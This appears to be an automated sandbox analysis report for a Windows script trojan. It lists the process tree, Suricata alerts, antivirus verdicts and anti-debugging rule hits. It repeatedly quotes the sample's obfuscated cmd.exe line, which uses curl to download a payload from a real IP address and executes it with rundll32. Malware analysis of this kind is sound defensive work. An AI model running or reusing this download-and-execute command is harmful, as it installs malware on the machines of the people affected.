Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Oct. 26, 2023, 10:30 a.m. | Oct. 26, 2023, 10:32 a.m. |
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c Yjkc || EcHO Yjkc & piNg Yjkc || cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc || rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY
2728-
PING.EXE piNg Yjkc
2828 -
curl.exe cuRl http://49.13.119.73/GJDtkud/Aerot -o C:\Users\test22\AppData\Local\Temp\Yjkc.dlld
2888 -
PING.EXE piNg -n 4 Yjkc
2940 -
rundll32.exe rUNdlL32 C:\Users\test22\AppData\Local\Temp\Yjkc.dlld, Crash
3012
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
www.ssl.com | 54.87.241.101 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49167 -> 49.13.119.73:80 | 2013028 | ET POLICY curl User-Agent Outbound | Attempted Information Leak |
TCP 192.168.56.101:49167 -> 49.13.119.73:80 | 2034567 | ET HUNTING curl User-Agent to Dotted Quad | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://49.13.119.73/GJDtkud/Aerot |
request | GET http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt |
request | GET http://49.13.119.73/GJDtkud/Aerot |
cmdline | "C:\Windows\System32\cmd.exe" /c Yjkc || EcHO Yjkc & piNg Yjkc || cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc || rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY |
cmdline | cmd.exe /c Yjkc || EcHO Yjkc & piNg Yjkc || cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc || rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY |
Kaspersky | HEUR:Trojan.Script.Generic |
Microsoft | Trojan:Script/Wacatac.B!ml |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Windows\System32\cmd.exe" /c Yjkc || EcHO Yjkc & piNg Yjkc || cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc || rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY |
cmdline | cmd.exe /c Yjkc || EcHO Yjkc & piNg Yjkc || cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc || rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY |
cmdline | piNg -n 4 Yjkc |
cmdline | piNg Yjkc |
host | 49.13.119.73 |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c Yjkc || EcHO Yjkc & piNg Yjkc || cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc || rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c Yjkc || EcHO Yjkc & piNg Yjkc || cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc || rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY |
file | C:\Windows\System32\cmd.exe |